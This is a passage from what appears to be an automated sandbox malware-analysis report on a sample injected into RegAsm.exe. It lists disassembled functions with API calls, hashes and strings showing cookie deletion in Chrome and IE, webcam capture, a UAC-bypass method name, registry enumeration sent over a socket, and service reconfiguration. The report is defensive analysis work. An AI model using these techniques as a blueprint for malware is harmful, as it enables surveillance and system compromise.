                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                • String ID: xUG$NG$NG$TG
                                                                                • API String ID: 3114080316-2811732169
                                                                                • Opcode ID: 6d72fe2b66a30c91890655e11a730b6c52f749376543310d6eb36e2ea9a9b40e
                                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                • Opcode Fuzzy Hash: 6d72fe2b66a30c91890655e11a730b6c52f749376543310d6eb36e2ea9a9b40e
                                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                • API String ID: 1133728706-4073444585
                                                                                • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                • String ID: xpF
                                                                                • API String ID: 1852769593-354647465
                                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                • _free.LIBCMT ref: 00450FC8
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00450FD3
                                                                                • _free.LIBCMT ref: 00450FDE
                                                                                • _free.LIBCMT ref: 00451032
                                                                                • _free.LIBCMT ref: 0045103D
                                                                                • _free.LIBCMT ref: 00451048
                                                                                • _free.LIBCMT ref: 00451053
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                • _free.LIBCMT ref: 100092AB
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 100092B6
                                                                                • _free.LIBCMT ref: 100092C1
                                                                                • _free.LIBCMT ref: 10009315
                                                                                • _free.LIBCMT ref: 10009320
                                                                                • _free.LIBCMT ref: 1000932B
                                                                                • _free.LIBCMT ref: 10009336
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                • int.LIBCPMT ref: 004111BE
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: (mG
                                                                                • API String ID: 2536120697-4059303827
                                                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                • API String ID: 3851391207-1839356972
                                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                                Strings
                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                • UserProfile, xrefs: 0040BAE8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                • API String ID: 2018770650-304995407
                                                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologSleep
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                • API String ID: 3469354165-3054508432
                                                                                • Opcode ID: 18da6155d95f6aa4cbed861c7fa3d16b08516d870a7c00cd1f1401118ad4f6f5
                                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                • Opcode Fuzzy Hash: 18da6155d95f6aa4cbed861c7fa3d16b08516d870a7c00cd1f1401118ad4f6f5
                                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe
                                                                                • String ID:
                                                                                • API String ID: 4189289331-0
                                                                                • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                • String ID:
                                                                                • API String ID: 1922816806-0
                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                • String ID:
                                                                                • API String ID: 3594823470-0
                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
